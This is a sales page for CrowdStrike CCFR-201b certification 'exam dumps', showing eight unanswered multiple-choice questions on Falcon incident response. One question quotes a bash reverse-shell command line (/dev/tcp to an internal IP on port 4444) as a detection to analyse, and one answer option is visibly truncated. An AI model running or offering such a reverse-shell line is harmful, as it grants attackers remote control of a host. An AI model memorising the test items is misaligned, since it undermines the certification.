Summer Certification Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: scxmas70

CCFR-201b Exam Dumps - CrowdStrike Certified Falcon Responder

Searching for workable clues to ace the CrowdStrike CCFR-201b Exam? You’re on the right place! ExamCert has realistic, trusted and authentic exam prep tools to help you achieve your desired credential. ExamCert’s CCFR-201b PDF Study Guide, Testing Engine and Exam Dumps follow a reliable exam preparation strategy, providing you the most relevant and updated study material that is crafted in an easy to learn format of questions and answers. ExamCert’s study tools aim at simplifying all complex and confusing concepts of the exam and introduce you to the real exam scenario and practice it with the help of its testing engine and real exam dumps

Go to page:
Question # 49

A responder has identified a suspicious PowerShell script executing on a domain controller. To perform a deep-dive forensic analysis of every action taken by that specific process—including network connections and file modifications—the analyst needs to pivot to a Process Timeline. What is the absolute minimum telemetry data required to generate this auto-filled view?

A.

Agent ID (AID) and Local IP Address

B.

Agent ID (AID) and Target Process ID (TargetProcessId_decimal)

C.

Hostname and MAC Address

D.

User SID and SHA256 Hash

Full Access
Question # 50

If the Falcon sensor identifies suspicious behavioral patterns—such as a process attempting to dump memory from lsass.exe—what specific type of detection will be generated?

A.

Indicator of Compromise (IOC)

B.

Indicator of Attack (IOA)

C.

Known Malware Alert

D.

Intelligence Data Match

Full Access
Question # 51

How long are quarantined files stored in the CrowdStrike Cloud?

A.

45 Days

B.

90 Days

C.

Days

D.

Quarantined files are not deleted

Full Access
Question # 52

Aside from a Process Timeline or Event Search, how do you export process event data from a detection in .CSV format?

A.

You can ' t export detailed event data from a detection, you have to use the Process Timeline or an Event Search

B.

In Full Detection Details, you expand the nodes of the process tree you wish to expand and then click the " Export Process Events " button

C.

In Full Detection Details, you choose the " View Process Activity " option and then export from that view

D.

From the Detections Dashboard, you right-click the event type you wish to export and choose CSV. JSON or XML

Full Access
Question # 53

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

Full Access
Question # 54

When analyzing an executable with a global prevalence of common; but you do not know what the executable is. what is the best course of action?

A.

Do nothing, as this file is common and well known

B.

From detection, click the VT Hash button to pivot to VirusTotal to investigate further

C.

From detection, use API manager to create a custom blocklist

D.

From detection, submit to FalconX for deep dive analysis

Full Access
Question # 55

Evaluate the following process tree observed in a detection:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe

Based on the parent-child relationships, which entry source is most likely?

A.

A remote service exploitation targeting a system process.

B.

A phishing attack where the user executed a malicious file from the desktop.

C.

A scheduled task running under the SYSTEM account.

D.

A supply chain attack targeting the Windows Boot manager.

Full Access
Question # 56

In the Hash Search tool, which of the following is listed under Process Executions?

A.

Operating System

B.

File Signature

C.

Command Line

D.

Sensor Version

Full Access
Go to page: